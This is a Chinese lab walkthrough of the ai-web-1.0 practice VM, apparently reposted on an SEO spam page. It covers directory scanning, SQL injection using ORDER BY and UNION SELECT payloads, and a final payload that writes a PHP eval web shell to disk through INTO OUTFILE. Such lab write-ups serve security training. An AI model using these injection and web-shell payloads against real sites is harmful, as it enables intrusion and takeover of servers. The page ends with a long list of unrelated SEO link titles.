当前位置: 首页 > wzjs >正文

学校网站建设报价seo面试常见问题及答案

学校网站建设报价,seo面试常见问题及答案,珠海网站建设制作设计,网站建设需要准备什么1.环境 虚拟机:kali 靶机:ai-web-1.0 2.获取靶机ip 确认靶机ip为192.168.13.160 3.获取绝对路径 用御剑扫描发现两个路径 http://192.168.13.160/robots. txt和http://192.168.13.160/index.html 发现一些路径 用kali的dirb扫描发现一个info.php文件…

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径

http://www.dtcms.com/wzjs/184582.html

相关文章:

  • 网站如何判断做的好不好武汉seo推广优化公司
  • 专门做水生植物销售网站免费培训机构管理系统
  • 通州宋庄网站建设长沙专业网络推广公司
  • 重庆梁平网站建设哪家便宜网站怎么宣传
  • 本溪做网站的北京整站线上推广优化
  • 网站建设补充协议模板seo运营招聘
  • 网站销售源码网络促销
  • 长春网站关键词推广杭州seo关键字优化
  • 石家庄做网站好的网络技术有限公司seo自媒体运营技巧
  • 美工培训班学校网站手机版排名seo
  • 南昌做网站优化价格新闻发稿平台
  • 动态网站的技术有开发网站的公司
  • 福州网站建设优化前端培训费用大概多少
  • 微信做任务赚钱的网站舟山百度seo
  • 一个人可以建设网站吗如何快速推广一个app
  • 阿里去可以做几个网站陕西seo顾问服务
  • 怎么开网店一件代发网页优化怎么做
  • 网络推广怎么能做好班级优化大师下载
  • 孝感专业做网站公司网络推广培训
  • 企业网站建设搭建湖南网站营销seo方案
  • 安徽制作网站的公司哪家好百度添加到桌面
  • 哪个网站做任务钱给得多淄博头条新闻今天
  • 邵阳网站推广关键词优化快速
  • 网站建设素材包b2b平台都有哪些网站
  • 公司网站实名认证怎么做网站分析案例
  • 怎么查网站接入商合肥关键词排名
  • 建设网站设计制作廊坊网站推广公司
  • 三网合一网站建设费用一站式发稿平台
  • 做爰片在线看网站做网站公司
  • 网页设计网站链接怎么做软文发布推广平台